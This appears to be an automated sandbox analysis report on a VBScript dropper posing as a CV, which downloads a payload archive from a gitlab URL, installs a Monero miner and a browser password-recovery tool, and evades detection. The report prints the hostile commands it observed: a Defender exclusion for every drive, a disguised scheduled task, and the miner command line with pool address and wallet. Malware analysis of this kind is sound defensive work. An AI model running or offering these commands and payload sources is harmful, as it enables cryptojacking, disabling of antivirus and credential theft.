Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like '%$%'
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5028 Thread sleep count: 9721 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6904 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Users\Public\WindowsUpdate\mservice.exe TID: 6416 Thread sleep time: -199780s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9721 Jump to behavior
Source: C:\Users\Public\WindowsUpdate\mservice.exe Window / User API: threadDelayed 9989 Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Found dropped PE file which has not been started or loaded
Source: C:\Users\Public\7g.exe Dropped PE file which has not been started: C:\Users\Public\WindowsUpdate\WinRing0x64.sys Jump to dropped file
Source: C:\Users\Public\7g.exe Dropped PE file which has not been started: C:\Users\Public\WindowsUpdate\ps.exe Jump to dropped file
Source: C:\Users\Public\7g.exe Dropped PE file which has not been started: C:\Users\Public\WindowsUpdate\go.exe Jump to dropped file
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\7g.exe Code function: 11_2_003B716C __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 11_2_003B716C
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Adobe\ Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: wscript.exe, 00000018.00000003.897773136.000001DBC74D0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: wscript.exe, 00000005.00000003.811414806.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858655277.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860747465.00000221630D3000.00000004.00000020.00020000.00000000.sdmp, mservice.exe, 00000013.00000002.992637368.0000018540531000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\7g.exe Code function: 11_2_003B6553 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 11_2_003B6553
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\7g.exe Code function: 11_2_003EA7A4 GetCurrentProcess,GetProcessTimes,fputs,memset,GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,__aulldiv,fputs,fputs,__aulldiv,__aulldiv,fputs, 11_2_003EA7A4
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 49.12.202.237 443 Jump to behavior
Source: C:\Windows\System32\wscript.exe Domain query: www.7-zip.org
Source: C:\Windows\System32\wscript.exe Domain query: gitlab.com
Source: C:\Windows\System32\wscript.exe Network Connect: 172.65.251.78 443 Jump to behavior
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: 7zr[1].exe.5.dr Jump to dropped file
Adds a directory exclusion to Windows Defender
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l: Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\Public\WindowsUpdate\mservice.exe "c:\users\public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pnzm7cvxc77nhzvzhreafavbjx4gvxyvea8hkhuxhuzhqfdxwfjmcczz959w8kelv8ffgk6dkexqq9uhaxaucj5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\Public\WindowsUpdate\mservice.exe "c:\users\public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pnzm7cvxc77nhzvzhreafavbjx4gvxyvea8hkhuxhuzhqfdxwfjmcczz959w8kelv8ffgk6dkexqq9uhaxaucj5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l: Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: conhost.exe, 00000014.00000002.992832390.000002E14B650000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: XProgram Manager
Source: conhost.exe, 00000014.00000002.992832390.000002E14B650000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: conhost.exe, 00000014.00000002.992832390.000002E14B650000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: conhost.exe, 00000014.00000002.992832390.000002E14B650000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\Public\7g.exe Code function: 11_2_003BA4D0 GetSystemTimeAsFileTime, 11_2_003BA4D0
Source: C:\Users\Public\7g.exe Code function: 11_2_0041D2A0 GetVersion,GetModuleHandleW,GetProcAddress, 11_2_0041D2A0

Stealing of Sensitive Information
barindex
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: 11.3.7g.exe.35b7600.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7g.exe PID: 5428, type: MEMORYSTR
Source: Yara match File source: C:\Users\Public\WindowsUpdate\ps.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 882715 Sample: curriculum_vitae-copie.vbs Startdate: 06/06/2023 Architecture: WINDOWS Score: 100 72 Sigma detected: Register Wscript In Run Key 2->72 74 Sigma detected: Xmrig 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 9 other signatures 2->78 8 wscript.exe 1 2->8         started        11 wscript.exe 2 2->11         started        13 wscript.exe 1 2->13         started        15 wscript.exe 2->15         started        process3 signatures4 96 System process connects to network (likely due to code injection or exploit) 8->96 98 Benign windows process drops PE files 8->98 100 VBScript performs obfuscated calls to suspicious functions 8->100 104 6 other signatures 8->104 17 wscript.exe 1 20 8->17         started        102 Wscript called in batch mode (surpress errors) 11->102 22 mservice.exe 1 11->22         started        24 wscript.exe 1 11->24         started        26 wscript.exe 13->26         started        28 wscript.exe 15->28         started        process5 dnsIp6 66 www.7-zip.org 49.12.202.237, 443, 49712 HETZNER-ASDE Germany 17->66 68 gitlab.com 172.65.251.78, 443, 49713 CLOUDFLARENETUS United States 17->68 52 C:\Users\user\AppData\Local\...\7zr[1].exe, PE32 17->52 dropped 54 C:\Users\Public\7g.exe, PE32 17->54 dropped 56 C:\Users\Public\gmail.7z, 7-zip 17->56 dropped 80 System process connects to network (likely due to code injection or exploit) 17->80 82 Wscript starts Powershell (via cmd or directly) 17->82 84 Deletes itself after installation 17->84 94 2 other signatures 17->94 30 7g.exe 10 17->30         started        34 cmd.exe 1 17->34         started        36 cmd.exe 1 17->36         started        38 wscript.exe 1 17->38         started        70 141.94.96.144, 443, 49714 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 22->70 86 Antivirus detection for dropped file 22->86 88 Multi AV Scanner detection for dropped file 22->88 90 Query firmware table information (likely to detect VMs) 22->90 92 Machine Learning detection for dropped file 22->92 40 conhost.exe 22->40         started        file7 signatures8 process9 file10 58 C:\Users\Public\WindowsUpdate\ps.exe, PE32 30->58 dropped 60 C:\Users\Public\WindowsUpdate\mservice.exe, PE32+ 30->60 dropped 62 C:\Users\Public\WindowsUpdate\go.exe, PE32 30->62 dropped 64 4 other malicious files 30->64 dropped 106 Potential malicious VBS script found (has network functionality) 30->106 108 Potential evasive VBS script found (sleep loop) 30->108 110 Sample is not signed and drops a device driver 30->110 42 conhost.exe 30->42         started        112 Wscript starts Powershell (via cmd or directly) 34->112 114 Uses schtasks.exe or at.exe to add and modify task schedules 34->114 116 Adds a directory exclusion to Windows Defender 34->116 44 powershell.exe 19 34->44         started        46 conhost.exe 34->46         started        48 conhost.exe 36->48         started        50 schtasks.exe 1 36->50         started        signatures11 process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.65.251.78
 gitlab.com United States
13335 CLOUDFLARENETUS false
49.12.202.237
 www.7-zip.org Germany
24940 HETZNER-ASDE false
141.94.96.144
 unknown Germany
680 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese true

Contacted Domains

Name IP Active
www.7-zip.org 49.12.202.237 true
gitlab.com 172.65.251.78 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=false false
    		high
    https://www.7-zip.org/a/7zr.exe false
      		high